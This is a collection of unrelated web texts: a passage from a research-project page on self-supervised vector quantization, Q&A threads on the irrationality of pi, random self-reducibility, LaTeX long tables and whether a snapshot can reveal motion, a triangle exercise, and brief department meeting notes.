Our learning goal is to find significant clusters in $Y$ (upper part of above figure) that may be projected back to $X$ (lower part of above figure) and used as class labels to train a classifier, thus forming a mapping $f : \mathbb{R}^m \rightarrow \mathbb{N}$ from input space feature vectors to class labels representing affordances grounded in output space feature clusters. We consider this as a multi-view learning problem given that there is a natural separation between the two feature spaces under consideration, which model potential causes and potential effects respectively, and also as a self-supervised learning problem given that the class clusters must be discovered in output space $Y$ in an unsupervised manner before being exploited for supervised discriminative learning in input space $X$, a process that must occur online, dynamically and autonomously.
Our solution to this problem involves representing each of the data views via vector quantization using codebooks of prototype vectors $W = \{ {\mathbf w}_j \in \mathbb{R}^{m} \,\left|\, j = 1,\ldots,M \right. \}$ for the input space and $V = \{ {\mathbf v}_k \in \mathbb{R}^{n} \,\left|\, k = 1,\ldots,N \right. \}$ for the output space, respectively, approximating the data distributions in each view. We train the codebooks in each view using combinations of the self-organizing map (SOM) algorithm and extended forms of the learning vector quantization (LVQ) algorithm, while also training the cross-view weights that connect them using Hebbian learning. The interested reader is referred to the IJARS paper for further details. The project code is not well optimized, organised, or maintained, but I am preserving it on Github for posterity and potential future inspiration.
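To make the mechanics concrete, here is a minimal sketch of the general idea in Python (my own illustration; the dimensions, learning rate, update rules and variable names are assumptions for this sketch and do not reproduce the actual SSLVQ Matlab API): two codebooks quantize co-occurring samples in the two views, and a Hebbian weight matrix links the winning prototypes so that output-space clusters can later be projected back to label the input space.

```python
# Sketch of cross-view Hebbian linking between two vector-quantization codebooks.
import numpy as np

rng = np.random.default_rng(0)
m, n, M, N = 8, 4, 20, 10          # feature dims and codebook sizes (assumed)
W = rng.normal(size=(M, m))        # input-view prototypes
V = rng.normal(size=(N, n))        # output-view prototypes
H = np.zeros((M, N))               # cross-view Hebbian weights

def winner(codebook, sample):
    return np.argmin(np.linalg.norm(codebook - sample, axis=1))

def train_step(x, y, lr=0.05):
    j = winner(W, x)               # best-matching unit in the input view
    k = winner(V, y)               # best-matching unit in the output view
    W[j] += lr * (x - W[j])        # simple VQ-style prototype updates
    V[k] += lr * (y - V[k])
    H[j, k] += 1.0                 # Hebbian co-activation count

# toy co-occurring data: y is a noisy linear image of x
A = rng.normal(size=(n, m))
for _ in range(2000):
    x = rng.normal(size=m)
    train_step(x, A @ x + 0.1 * rng.normal(size=n))

# projection: each input prototype inherits the label of its strongest output cluster
labels_for_W = H.argmax(axis=1)
print(labels_for_W)
```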
http://mathcentral.uregina.ca/QQ/database/QQ.09.06/s/matthew1.html
Math Central Quandaries & Queries
Question from Matthew, a student: I have what I like to think of as a rather interesting question that I can't explain confidently for the life of me. If we take a circle with a radius of 1 and we calculate the circumference, we can use 2 pi R. Doing this calculation results in a circumference of 6.28318530717~ which goes on forever. However, if you were to take that same circle in the real world, say with radius 1 cm, and wrap a string around it, and then measure the string, you don't get 6.28~, you get something like 6.2, a much more finite distance. The length of the string is not an irrational number, like the math claims it to be. Naturally this occurs because pi is an irrational number, but why is it? My only guess is that our current estimation of pi is not actually correct to "true pi", but it's just really, really close. If however this is the case, why hasn't the "true pi" been discovered? Is anyone actually working on that problem and what kind of methods are used for such a thing? Any insight that can help me get a better understanding of this problem would be much appreciated.
Matthew, we have two responses for you:
Matthew,
If you measure the time two sprinters take to run 100 meters, the answer you will get depends on the instrument you take:
• With your wrist watch you might say the winner took 10 seconds and the loser 11 seconds.
• With a good stopwatch you might say the winner took 10.2 seconds and the loser 10.9 seconds.
• With a video camera you might say the winner took 10.218 seconds and the loser 10.874 seconds.
• With even better instruments you might even say that the winner took 10.217734 seconds and the loser 10.874037 seconds.
• And so on.
So I would say that the "real time" that the sprinters take, if such a thing exists, is an irrational number.
It is the same thing with pi: If I measure the circumference/diameter of a small coin with a string, I am happy to get 3. But if I take a larger circle and use better instruments, I get 3.14. With even larger circles and even better instruments, I would get even more decimals correct. And so on.
But because pi is a mathematical concept (ratio of circumference to diameter on an idealised circle) rather than a physical event (a race), it is possible to compute it mathematically rather than physically. On this University of St. Andrews web page we read that after centuries of calculations with polygons,
John Machin used the formula π/4 = 4 arctan(1/5) - arctan(1/239) and James Gregory's series for arctan(x) [to get 100 decimals of pi.]
Lambert proved that pi was irrational in 1761.
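As a quick check, a couple of lines of Python show that Machin's formula, with arctan evaluated by the standard library, already reproduces pi to the limit of double-precision arithmetic:

```python
from math import atan, pi

machin = 4 * (4 * atan(1/5) - atan(1/239))
print(machin)            # 3.141592653589793
print(abs(machin - pi))  # on the order of 1e-16: limited by double precision, not by the formula
```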
Claude Tardiff.
Hi Matthew.
You are using a device that only has a certain amount of precision. A ruler might measure 0.05 cm at best, other devices can get much more precise, but no device can get the uncertainty below about 10⁻³³ cm (and no such device is possible!). So there is in fact a "rounding off" implicit in your measurements.
Pi is a number which is irrational, and so numeric representation of it will necessarily be an approximation (3.14, for example, or 22/7 or 3.1415926535897932384626433832795029). However, we don't just have "approximations" or "estimates" of pi. We know its value precisely, we just can't express it in decimal or fraction form, because then it would be rational (by definition).
Some valid and absolutely precise expressions of Pi:
• The ratio of the circumference C to the diameter D of a perfect circle.
• Several more forms are at this web page and this web page. And there are certainly other much more advanced ways to find the exact value of pi.
Some people continue to calculate more and more decimal places for more accurate approximations of pi. I see someone has posted the first billion digits of pi on the internet. And other people continue to try to memorize a lot of digits of pi as well (although why anyone would want to be able to remember and recite 67000 digits is something I'll never understand).
Stephen.
https://realmath.de/english/geometry/triangle/angleside.php

Side-angle relationship

A triangle ABC has been drawn, and the measures of its interior angles and the lengths of its sides are shown. Move the points of triangle ABC and observe the respective angle measures and side lengths. Which of the following statements are correct?

• If α > 90° ⇒ a > b and a > c.
• If α = β ⇒ a = b.
• If α < 20° and β > 95° ⇒ c > b.
• If α > 60° and β < 60° ⇒ b > a.
• If β is smallest, b is shortest.
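The underlying side-angle relationship (the longer side lies opposite the larger angle) can also be probed numerically with the law of sines. The sketch below samples random triangles and looks for a counterexample to the first statement; the sampling scheme is just an illustrative choice:

```python
import numpy as np

rng = np.random.default_rng(1)

def random_triangle():
    """Random interior angles (degrees) summing to 180; side lengths via the law of sines."""
    angles = rng.dirichlet([1.0, 1.0, 1.0]) * 180.0
    sides = np.sin(np.radians(angles))      # a : b : c = sin(alpha) : sin(beta) : sin(gamma)
    return angles, sides

# Empirical check of the first statement: alpha > 90 degrees implies a is the longest side.
for _ in range(10000):
    (alpha, beta, gamma), (a, b, c) = random_triangle()
    if alpha > 90 and not (a > b and a > c):
        print("counterexample:", alpha, beta, gamma)
        break
else:
    print("no counterexample among 10000 random triangles")
```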
https://cstheory.stackexchange.com/questions/33274/are-graph-and-group-isomorphism-problems-random-self-reducible/33352

# Are Graph and Group Isomorphism problems random self-reducible?
Are Graph and Group Isomorphism problems known to be random self-reducible? If so is there a good proof?
Are there other non-trivial examples of random self-reducibility? Is there a good reference?
• What do you mean exactly by "random self-reducible"? – Kaveh Dec 6 '15 at 23:04
• @Kaveh Something along lines of Dlog or permanent like in en.wikipedia.org/wiki/Random_self-reducibility – T.... Dec 6 '15 at 23:19
• So you want to reduce the problem of deciding if graph $G$ is isomorphic to $H$ to deciding isomorphism on $m = \textrm{poly}(n)$ pairs $(G_1, H_1), \ldots, (G_m, H_m)$ where each $(G_i, H_i)$ is distributed uniformly over all pairs of graphs on $n$ vertices? This makes little sense since a uniformly distributed pair of graphs is non-isomorphic with very high probability. Do you mean something else? (As has been pointed out before, you should think harder before asking questions.) – Sasho Nikolov Dec 7 '15 at 1:46
• @SashoNikolov In here (books.google.com/…) it is stated that graph isomorphism is random self-reducible. What does it mean here? – T.... Dec 7 '15 at 4:12
• It's the notion from this paper dx.doi.org/10.1109/SFCS.1987.49. The reduction takes $(G, H)$ and outputs $(G, H')$, where $H'$ is $H$ with the vertices uniformly permuted. This reduces GI to distinguishing between the cases (1) $H$ is a uniform graph from the isomorphism class of $G$; (2) $G$ and $H$ are not isomorphic. But this is not a reduction to uniform instances of GI. The question is, what notion of random self-reducibility do you want, precisely? – Sasho Nikolov Dec 7 '15 at 5:01
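Concretely, the randomization step described in the last comment above is just a uniform relabelling of one of the two graphs. A minimal sketch (representing graphs by adjacency matrices is an assumption made for illustration):

```python
import numpy as np

rng = np.random.default_rng(0)

def rerandomize(H):
    """Return a copy of H (an n x n adjacency matrix) with its vertices uniformly permuted.

    The result is a uniform sample from the isomorphism class of H, so the map
    (G, H) -> (G, H') sends isomorphic pairs to pairs whose second component is
    uniform over that class, while non-isomorphic pairs remain non-isomorphic.
    """
    n = H.shape[0]
    perm = rng.permutation(n)
    return H[np.ix_(perm, perm)]
```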
For Group Isomorphism, this is not known. However, it's also somewhat of a funny question, because of how much the group order can restrict the structure of a group. In many senses, most groups are of order $2^k$, and are nilpotent of class 2. I find it hard to see how one would get a random self-reduction for GroupIso...
https://tex.stackexchange.com/questions/458463/table-formatting-using-xltabular

# Table formatting using xltabular
I am having some issues with formatting the below table.
The first issue: It is not positioning after the text and instead is starting on a new page despite the positioning !htbp.
The second issue: The table is large but it is not breaking over to the second page. I am unsure about why this is happening.
\textit{Table 2} outlines the structure of this document
\begin{table}[!htbp]
\caption {Document Structure} \label{tab:Document Structure}
\begin{xltabular}{\textwidth}{|X|}
\hline
\multicolumn{1}{|c|}{Chapter One: Introduction} \\ \hline
This chapter will introduce the project and provide the,reader with context of the subject along with the reasons for undertaking the,project and an outline of the project contents. \\
\hline
\multicolumn{1}{|c|}{Chapter Two: Literature Review} \\ \hline
This chapter will review current literature surrounding,the subjects of this project this will explore the current systems and,theoretical systems that form the basis for this project. \\ \hline
\multicolumn{1}{|c|}{Chapter Three: Technology Review} \\ \hline
Throughout this chapter will provide a review of the,technology used in current systems and the technology that will be used for,the proposed system. \\ \hline
\multicolumn{1}{|c|}{Chapter Four: Analysis of Current Systems} \\ \hline
In this chapter a comparison of current systems will be,provided to form a platform from which to model the proposed system. This comparison,will be used to model the functionality of the system and methodology used,for testing the system. \\ \hline
\multicolumn{1}{|c|}{Chapter Five: System Analysis and Requirements} \\ \hline
In this chapter the base functionality for the proposed system,will be discussed and a draft of its implementation will be provided in the,form of system and communication diagrams. \\ \hline
\multicolumn{1}{|c|}{Chapter Six: Use Cases} \\ \hline
Throughout this chapter some examples of use cases will be given. these use cases will for the basis for the modeling of system functionality going forward with the project. For the purpose of this project three use cases will be given. chapter,five. \\ \hline
\multicolumn{1}{|c|}{Chapter Seven: System Design} \\ \hline
Throughout this chapter the system implementation will be,described and discussed based on the findings from chapter four and chapter,five. \\ \hline
\multicolumn{1}{|c|}{Chapter Eight: Software} \\ \hline
This chapter will discuss the software and how it was,constructed with reference to functionality and system requirements discussed,in previous chapters. \\ \hline
\multicolumn{1}{|c|}{Chapter Nine: Implementation} \\ \hline
In this chapter the implementation and integration of the,software into the hardware environment will be discussed with further,reasoning into the choices made on both software modelling and hardware,choices for this project. \\ \hline
\multicolumn{1}{|c|}{Chapter Ten: System Testing} \\ \hline
Throughout this chapter a set of test methods will be discussed,,and results of these tests will be displayed. The chosen test method for this,project is user interaction dialogues. \\ \hline
\multicolumn{1}{|c|}{Chapter Eleven: Evaluation} \\ \hline
This chapter will include a critical evaluation of the,system as well as any changes and limitations that were experienced along,with how these limitations were dealt with and how the project was adapted to,these changes. \\ \hline
\multicolumn{1}{|c|}{Chapter Twelve: Conclusion} \\ \hline
In this chapter a conclusion will be drawn, and a review,of the objectives will be carried out to determine if the project achieved the, aims that were set out for it. \\ \hline
\end{xltabular}
\end{table}
• Please provide a minimal working example (MWE). – user156344 Nov 5 '18 at 12:14
• you have placed it in a table environment which is a non-breakable float. – David Carlisle Nov 5 '18 at 12:43
• also there is no reason to use a one-column table, but here even more you have X specified but override it as c on every line, so there is no X column at all and tabularx has no way to force the table to the specified width. – David Carlisle Nov 5 '18 at 12:45
• @DavidCarlisle, what would I use in place of \begin{table}? – bdg Nov 5 '18 at 12:48
• nothing: the package makes your tabular into a longtable, see the package docs. But it isn't clear why you have a table at all; what is the difference between a 1-column table and normal text paragraphs? – David Carlisle Nov 5 '18 at 12:49
From looking at the example text that you have there, it looks to me like we are in the document structure part of your report/thesis.
Given the question, I would suggest longtable and booktabs for what you are trying to accomplish.
Longtable allows the table to span multiple pages, and booktabs gives you some nice control over rules.
\documentclass[11pt]{report}
\usepackage{longtable, booktabs}
\begin{document}
\textit{Table 2} outlines the structure of this document
\begin{longtable}{p{\textwidth}l}
\textbf{Chapter One: Introduction} &\\ \cmidrule[\heavyrulewidth](l{-5pt}r{20pt}){1-2}
This chapter will introduce the project and provide the,reader with context of the subject along with the reasons for undertaking the, project and an outline of the project contents. &\\ \addlinespace[10pt]
\textbf{Chapter Two: Literature Review} &\\ \cmidrule[\heavyrulewidth](l{-5pt}r{20pt}){1-2}
This chapter will review current literature surrounding,the subjects of this project this will explore the current systems and,theoretical systems that form the basis for this project. &\\ \addlinespace[10pt]
\textbf{Chapter Three: Technology Review} &\\ \cmidrule[\heavyrulewidth](l{-5pt}r{20pt}){1-2}
Throughout this chapter will provide a review of the,technology used in current systems and the technology that will be used for,the proposed system. &\\ \addlinespace[10pt]
\textbf{Chapter Four: Analysis of Current Systems} &\\ \cmidrule[\heavyrulewidth](l{-5pt}r{20pt}){1-2}
In this chapter a comparison of current systems will be,provided to form a platform from which to model the proposed system. This comparison,will be used to model the functionality of the system and methodology used,for testing the system. &\\ \addlinespace[10pt]
\textbf{Chapter Five: System Analysis and Requirements} &\\ \cmidrule[\heavyrulewidth](l{-5pt}r{20pt}){1-2}
In this chapter the base functionality for the proposed system,will be discussed and a draft of its implementation will be provided in the,form of system and communication diagrams. &\\ \addlinespace[10pt]
\textbf{Chapter Six: Use Cases} &\\ \cmidrule[\heavyrulewidth](l{-5pt}r{20pt}){1-2}
Throughout this chapter some examples of use cases will be given.\ these use cases will for the basis for the modeling of system functionality going forward with the project. For the purpose of this project three use cases will be given.\ chapter,five. & \\ \addlinespace[10pt]
\textbf{Chapter Seven: System Design} &\\ \cmidrule[\heavyrulewidth](l{-5pt}r{20pt}){1-2}
Throughout this chapter the system implementation will be,described and discussed based on the findings from chapter four and chapter,five. &\\ \addlinespace[10pt]
\textbf{Chapter Eight: Software} &\\ \cmidrule[\heavyrulewidth](l{-5pt}r{20pt}){1-2}
This chapter will discuss the software and how it was,constructed with reference to functionality and system requirements discussed,in previous chapters. &\\ \addlinespace[10pt]
\textbf{Chapter Nine: Implementation} &\\ \cmidrule[\heavyrulewidth](l{-5pt}r{20pt}){1-2}
In this chapter the implementation and integration of the,software into the hardware environment will be discussed with further,reasoning into the choices made on both software modelling and hardware,choices for this project. &\\ \addlinespace[10pt]
\textbf{Chapter Ten: System Testing} &\\ \cmidrule[\heavyrulewidth](l{-5pt}r{20pt}){1-2}
Throughout this chapter a set of test methods will be discussed,,and results of these tests will be displayed. The chosen test method for this,project is user interaction dialogues. &\\ \addlinespace[10pt]
\textbf{Chapter Eleven: Evaluation} &\\ \cmidrule[\heavyrulewidth](l{-5pt}r{20pt}){1-2}
This chapter will include a critical evaluation of the,system as well as any changes and limitations that were experienced along,with how these limitations were dealt with and how the project was adapted to,these changes. &\\ \addlinespace[10pt]
\textbf{Chapter Twelve: Conclusion} &\\ \cmidrule[\heavyrulewidth](l{-5pt}r{20pt}){1-2}
In this chapter a conclusion will be drawn, and a review,of the objectives will be carried out to determine if the project achieved the, aims that were set out for it. &\\ \bottomrule
\caption{Document Structure}\label{tab:Document Structure}
\end{longtable}
\end{document}
This should give you the following outcome:
• It should be noted that this only answers your question, I wouldn't use tables for this kind of thing. – Ole Aldric Nov 5 '18 at 13:05
https://physics.stackexchange.com/questions/508066/is-there-any-physical-evidence-for-motion

# Is there any physical evidence for motion?
Let's say that we have 2 tennis balls in space, one being in motion (say, pushed by an astronaut), and the other one still.
If we could take a snapshot of both tennis balls, would there be any evidence that could suggest that one is moving and the other one is still? Is there anything happening, at the atomic level or bigger, being responsible for the motion?
If there isn't, and both balls are absolutely identical, then how come one is still and the other one moving? Where does the difference of motion come from?
• Current theories don’t support an absolute notion of motion at all. They support notions of relative motion and of absolute changes in motion. Oct 13, 2019 at 21:15
• @StudyStudy Your comment seems to suggest that if I see an object moving relative to me that a force must be acting on it. This is not the case. Oct 14, 2019 at 5:53
• @StudyStudy No, force is required for acceleration. If either ball is changing velocity, then detecting forces might work, but then you'll probably have better ways to determine that than looking at the heat created by material deformation as a consequence of an outside force. (for one, it might be gravity doing the acceleration - good luck detecting a local heat change from that) Oct 14, 2019 at 8:02
• Your question contains an inherent contradiction. You're asking about motion, but with the constraint that there be no passage of time (i.e., all you have is a snapshot). The problem is that you can't define motion without the concept of time. If you could relax the constraint (say, with multiple snapshots taken at different times), then you could start to define motion. But as it is, you can't, and therefore the question can't really be answered. Oct 14, 2019 at 17:55
• @Richter65 I think it is valid to ask what is the evidence collected from a still snapshot that an object is moving, because in terms of latent properties, the masses have nonzero momentum with respect to each other. The inability to observe such a property from a projection down to a single point in time does not contradict the existence of such a property, which becomes evident as time progresses. What the OP is asking is whether there is any remnant or indication of the momentum effect that could be observed from a single instantaneous observation. Oct 15, 2019 at 18:54
According to classical physics: no. It is impossible to tell how fast something is moving from a snapshot.
According to special relativity: yes. If we choose a frame of reference where one of the balls is at rest then only that ball will look normal. The other ball is moving in this frame so it will be length contracted. If its rest length is $L$ then its length will now be $L\sqrt{1-v^2/c^2}$. Since $1-v^2/c^2<1$ the ball will be shorter in the direction it is moving.
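To get a feel for the size of the effect, here is a small numerical sketch of that contraction factor (the 6.7 cm rest diameter of a tennis ball is an approximate figure chosen for illustration):

```python
import math

c = 299_792_458.0                       # speed of light in m/s

def contracted(length, v):
    """Length of an object of rest length `length`, measured in a frame where it moves at speed v."""
    return length * math.sqrt(1 - (v / c) ** 2)

rest_diameter = 0.067                   # m, roughly a tennis ball
for v in (30.0, 0.1 * c, 0.9 * c):      # a thrown ball, then 0.1c and 0.9c
    print(f"v = {v:14.4e} m/s  ->  diameter = {contracted(rest_diameter, v):.10f} m")
```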
According to quantum mechanics: yes? In quantum mechanics particles are described by a wavefunction $\psi(x)$ which (handwavingly) says how much of the particle is present at a certain point. A tennis ball is also described by a wavefunction which you can get by combining all the wavefunctions of its atoms. The wavefunction actually contains all the information you can possibly know about an object, including its velocity. So if you could pause time and look at the wavefunction you would have enough information to know its (most likely) velocity. In real life you can't actually look at wavefunctions: you have to perform an experiment to extract information from the wavefunction. At this point you might wonder if that still counts as taking a snapshot.
• "According to quantum mechanics: yes?" Had a good chuckle at that. The most quantum of answers. Oct 14, 2019 at 12:40
• With an ideally perfect camera and ideally identical tennis balls, with motion not perpendicular to the camera, could you not use doppler shift in the spectrum to tell at least one of them was moving relative to the camera, (And which one, if you had the tennis ball to compare the photos to?) Oct 14, 2019 at 12:49
• You are ignoring the Penrose-Terrell effect. A photograph would not show the flattening that special relativity predicts. math.ucr.edu/home/baez/physics/Relativity/SR/penrose.html Oct 14, 2019 at 13:00
• You should specify in the answer what you mean by "snapshot". You seem to have interpreted it not as a photo but as a slice of the universe at a fixed coordinate time. There's no way to actually freeze a slice of the universe, so your answers end up depending on arbitrary assumptions about the magical process by which this was done. There's no record of the motion in the Newtonian case not because of any property of Newtonian mechanics, but because your magical process saved only the positions and threw away the velocities. Oct 14, 2019 at 16:22
• I don't quite understand the QM answer. Classically, a system's state is the position and velocity of each particle. If you're saying a quantum snapshot contains the full wavefunction information, then surely a comparable classical snapshot contains both position and velocity! Saying that this is somehow a feature of quantum physics is misleading. – JiK Oct 15, 2019 at 8:25
If we could take a snapshot of both tennis balls, would there be any evidence that could suggest that one is moving and the other one is still?
We can't. Problem solved.
Well, almost problem solved. So in reality, we can take shorter and shorter exposures. I can take a 1 second exposure of the scene, where the moving tennis ball will be heavily blurred while the stationary one will be crisp. I can capture the same scene at 1/100th of a second, and moving ball will look more crisp like the stationary one. I can capture the same scene at 1/1000th of a second, and it will be very difficult for the human eye to discern which one is in motion. I can make these snapshots shorter and shorter. Indeed, we have looked at imaging scenes at such exacting shutter speeds that we can watch light propagate through the scene. But we never quite hit a perfect standstill. We never hit an infinitely fast shutter speed.
Now forgive me if I handwave a bit, but there is an unimaginably large body of evidence that motion exists. In particular, you'll fail to predict very much if you assume no motion occurs. So from that empirical point of view, we should find that motion exists. From a philosophical point of view, there's some interesting questions to be had regarding endurable versus perdurable views of the universe, but from a scientific perspective, we generally agree that motion exists.
So how do we resolve the conundrum you are considering? The answer is calculus. Roughly 400 years ago, Isaac Newton and Gottfried Leibniz independently developed a consistent way of dealing with infinitesimally small values. We generally accept this as the "correct" way of handling them. It does not permit us to consider a shutter speed which is truly infinite, letting us isolate a moment perfectly, to see if there is motion or not, but it does let us answer the question "what happens if we crank the shutter speed up? What if we go 1/100th of a second, 1/1000th, 1/100000th, 1/0000000000th of a second and just keep going?" What happens if we have an infinitesimally small exposure period in our camera?
Using that rigor, what we find is that modeling the world around us really requires two things. The first is the values you are familiar with, such as position. And the second is the derivatives of those familiar things, such as velocity. These are the results of applying the calculus to the former group.
We find that models such as Lagrangian and Hamiltonian models of systems work remarkably well for predicting virtually all systems. These systems explicitly include this concept of a derivative in them, this idea of an "instantaneous rate of change." So we say there is motion, because it seems unimaginably difficult to believe that these patterns work so well if there was not motion!
As a side note, you set up your experiment in space, so there's nothing much to interact with. However, had you set the experiment up in the water, you would find the chaotic flow behind the moving ball very interesting. It would be ripe with fascinating and beautiful twirls that are very hard to explain unless associated with some forward motion.
• I'm not in the slightest suggesting that motion does not exist, it would be absurd. I completely get all the newtonian - and other - sciences around motion, I'm not a conspirationnist. I'm just saying that it baffles me that in true life, when you look at the balls, you can't see any difference at all between them, yet one ball is moving and the other one isn't. It truly is fascinating to me. It doesn't seem to make sense that 2 objects in the very exact same state can have different behaviours. How come? Where is the difference stored? Oct 14, 2019 at 6:25
• @Skeptron they don't have the same state though - they have different velocities. They only appear to have the same state when the means by which you choose to observe the state are contrived to limit perception of the aspect of their state you're interested in. There is no such thing as directly observing something's state; only inferring it from interacting with it. If your interaction somehow takes place in infinitesimal time then velocity is imperceptible, but I'd argue this is impossible in absolute terms. Even with infinitesimal shutter speed, red-shift will still differentiate them. – Will Oct 14, 2019 at 8:37
• @Skeptron There would also not be the slightest difference between a green ball and a red ball if you decided to observe them only in the dark ... Oct 14, 2019 at 9:38
• @Skeptron they also "hold information" about their velocity, whether you observe them over a finite time interval or not. Indeed, even the different-colored balls would be differently-colored again if they had no thermal energy, so the distinction is at best one between ordered and disordered kinetic energy. – Will Oct 14, 2019 at 12:58
• But I think some of the issue you're having is mentioned in the last sentence of your comment. "... 2 objects in the very exact same state can have different behaviors." The two balls are not in the same state. The position only captures part of the state, not all of it. It's akin to the clever projections of the Godel Escher Bach book. In the case of that cover, a 2-d projection does not fully capture the 3d state of an object. In your case, a 3d "snapshot" of its position does not fully capture... Oct 14, 2019 at 15:09
It is about the frame of reference. In the frame of reference of the tennis ball pushed by the astronaut, that ball can be considered as standing still and the other ball, the astronaut, and everything else as moving. In the frame of reference of the other ball, it is that ball which can be considered as standing still, and the first ball as moving. If you were with either one, in its frame of reference, all of the physical laws of the universe would be the same and neither could be preferred as absolute. This is one of the basics of relativity.
• One realization which helps understand that motion is only relative to an arbitrary inertial system is that the common cases we refer to as "standing still" (e.g., my keyboard as I type appears to be motionless -- I can hit the keys pretty reliably!) are in reality hurtling through space at enormous speeds and on complicated trajectories composed of the rotation and orbits of the earth, sun, galaxy, local group and space expansion. One could make a cosmological case for using the microwave background as an absolute reference frame but that wouldn't change special relativity of motion. Oct 14, 2019 at 10:04
• To elaborate on "we are not standing still": Not only are we moving from most reasonable points of view; we are not even in an inertial system because of the rotational components. We are under permanent acceleration: We are not standing still relative to any inertial system. Oct 14, 2019 at 10:07
# Cylinders Don't Exist
If I show you a picture of two round objects and tell you that one is a sphere and the other is a cylinder you are looking at head-on, how can you tell whether I am telling the truth or lying? You can't, and therefore, I conclude that there is no difference between spheres and cylinders, because we lack the proper evidence for their existence.
# Projection
The point here is that motion requires time, and a snapshot is a projection of a 4-D extended object into 3- or 2-D. The most naive such projections will necessarily destroy information about additional dimensions. If I remove one of the axes which would help you distinguish a cylinder from a sphere (ignoring light reflections, etc.), this is no different than you removing the time dimension to make it impossible to distinguish between a moving or a static object.
# Conclusion
If you want to establish the separate existence of spheres and cylinders, you must examine them in all the dimensions which make them different. If you want to establish the existence of dynamic 4-D objects (objects which vary in the time dimension), you must examine them in all the dimensions which differentiate them from purely static objects (ones which are constant along the time dimension).
• Who said anything about cylinders? Oct 14, 2019 at 20:24
• @ja72 This answer introduces cylinders/spheres as an analogy for moving/not-moving. Oct 15, 2019 at 7:42
• I think this answer is underrated. None of the others even attempt to address the perceived problem in the question. If you think about all 4 dimensions as having all their points being simultaneously present, and our perception of time as just hindered, then what you have is really the equivalent of a 4d, unchanging model, like a display piece. This feels off, as it precludes change on the model itself, but can't think of how you would disprove it. Zero information transmitted (directly, not via inference or prediction) between moments in time seems suspect, if all moments already exist. Jan 21, 2021 at 23:56
Your question assumes one ball is moving and the other is still. That assumption is meaningless without specifying a frame of reference. All motion is relative. To each of the balls it would appear that the other was moving. The 'evidence' that they are moving includes the fact that they would appear smaller to each other, and that their separation was changing.
You are limiting your snapshot to a 3D picture.
If you took a 2D snapshot, it would be impossible to tell how deep your tennis "balls" are (in addition to being unable to tell their motion).
So, take a 4D "snapshot", and all'll be fine.
• This answer could explain what a 4D snapshot means and why it would show motion. – JiK Oct 15, 2019 at 10:28
If we could take a snapshot of both tennis balls, would there be any evidence that could suggest that one is moving and the other one is still? Is there anything happening, at the atomic level or bigger, being responsible for the motion?
If the balls are truly identical and you are at rest with respect to one of them, the light of the moving one will be shifted toward the blue or the red by the Doppler effect, depending on whether it is moving toward or away from you. This would be most evident if you were positioned between the balls and on their axis, but you would always be able to do it as long as the moving ball is at least partially approaching or moving away from you.
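For scale, the longitudinal relativistic Doppler factor for a source moving directly away is $\sqrt{(1-\beta)/(1+\beta)}$ with $\beta = v/c$; a short numerical sketch (the sample speeds are arbitrary):

```python
import math

c = 299_792_458.0                       # speed of light in m/s

def doppler_factor(v):
    """Observed/emitted frequency ratio for a source receding directly away at speed v."""
    beta = v / c
    return math.sqrt((1 - beta) / (1 + beta))

for v in (30.0, 0.01 * c, 0.5 * c):
    print(f"v = {v:14.4e} m/s  ->  f_obs/f_emit = {doppler_factor(v):.9f}")
```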
• A friendly addendum: this only identifies a ball in motion relative to the observer, not that one of the balls has intrinsic motion that the other ball does not have. You can freely choose the frame of reference of the observer to make one ball, or the other, or both, be in motion. Oct 15, 2019 at 17:10
The photos would look identical, but you would have to take each photo from a different inertial frame of reference. You would have to be moving at a different speed, in a different direction, to take each photo. This shows that there are inherent differences between objects in motion.
If there isn't, and both balls are absolutely identical, then how come one is still and the other one moving? Where does the difference of motion come from?
I don't think this question is nearly as perplexing as you might think, nor do I think it requires sophisticated physics like the best answer describes. Ask yourself: how do you show with a snapshot that a bowl of soup is at a cold 5 °C vs a warm 45 °C? Or how could you show that a radio is turned off or is blaring music? Intuitive solutions to these questions would be to take a picture with a thermometer, or with an oscilloscope attached to a microphone, respectively, in the same frame.
The easiest way to show with a snapshot that a tennis ball is moving, is by taking a picture with a speedometer reading in the same frame as the ball.
These examples are hard to show directly in a single snapshot in time because they all involve the collective motion of small particles (uniform velocity for motion, random for thermal, and periodic for sound). And motion is described as the change of position with time, but a snapshot captures an instant in time, not a change.
It is perhaps interesting to think about Mach's paradox in this context. I'll get back to your question and the limits of the two-body way of discussing special relativity in the end. One form of the paradox is this: imagine a bucket of water standing on the floor. The surface is (almost) flat. Now start spinning it. The water's surface begins to form a paraboloid. How does the water know it's spinning? Why is the frame of reference in which the water's surface is flat the same frame in which the stars do not move relative to the bucket (which almost coïncides with the frame where the Earth is still)?
The answer is that the presence of the stars determines the global geometry of the universe, and thus the local free-falling frame in which the bucket finds itself up to small corrections due to Earth's gravity and rotation (which is in free fall around the sun which is in free fall through the galaxy which is in free fall through the universe).
Now how does all this relate to your question? Well, we can determine accelerations relative to a global frame given by the fixed stars with as simple a tool as the aforementioned bucket. But if we accept that global frame as special, then we can also detect motion relative to that global frame, which is in a sense absolute as it is given by the universe in its entirety. To do this, you'd need a long exposure and a clear night-sky. You would then compare the motion of your tennis balls to the motion of the stars and you could in a meaningful sense call the difference of the motion relative to the stars an absolute motion, as it is relative to the universe as a whole (well, to good approximation depending on how many stars you can actually photograph). Since this is literally the opposite of what you had asked, it doesn't literally answer your question, but I think it answers the same question in spirit, namely whether there is a physical difference between "moving" and "stationary."
NB It may seem that I'm upending all of special relativity by that line of thinking but that's not true. Special relativity is a good law of nature, one just has to be aware of other objects which are present when applying it, and whether they have any influence on the question studied -- and that statement is a trivial truth which certainly was on Einstein's mind when he wrote the time dilation law for the first time.
It is possible to measure absolute motion relative to the cosmic microwave background. A system at rest with respect to the moving ball would measure a dipole in the background radiation.
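As a rough order-of-magnitude sketch (taking roughly 370 km/s for the solar system's speed relative to the CMB, an approximate literature value):

```python
T_cmb = 2.725            # K, mean CMB temperature
c = 299_792.458          # km/s
v = 370.0                # km/s, approximate solar-system speed relative to the CMB

dipole = T_cmb * v / c   # leading-order dipole amplitude, Delta T ~ T * (v/c)
print(f"dipole amplitude ~ {dipole * 1e3:.2f} mK")   # about 3.4 mK, close to the measured value
```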
If we look past your example with snapshots we can just look into modern technology and find a little thing called videos. They can record motion pretty easily. "Is there any physical evidence for motion", videos?
https://wiki.cs.byu.edu/cc/9-november-2015

1. VPN roll-out
Getting students used to it.
2. Collaborative Space status update
Furniture delivered day before Thanksgiving
3. Web site redesign status update
Need to formulate an RFP. Search for documents department wide, not just in a lab.
List of functionality:
Admin Roles
Research – research projects (infinite scroll) – research page (one project)
- tag people associated with each project (and role?)
People – associated with each person?
Publications – abstract
4. Laptop requirement and lab space usage
5. Items all research faculty could use
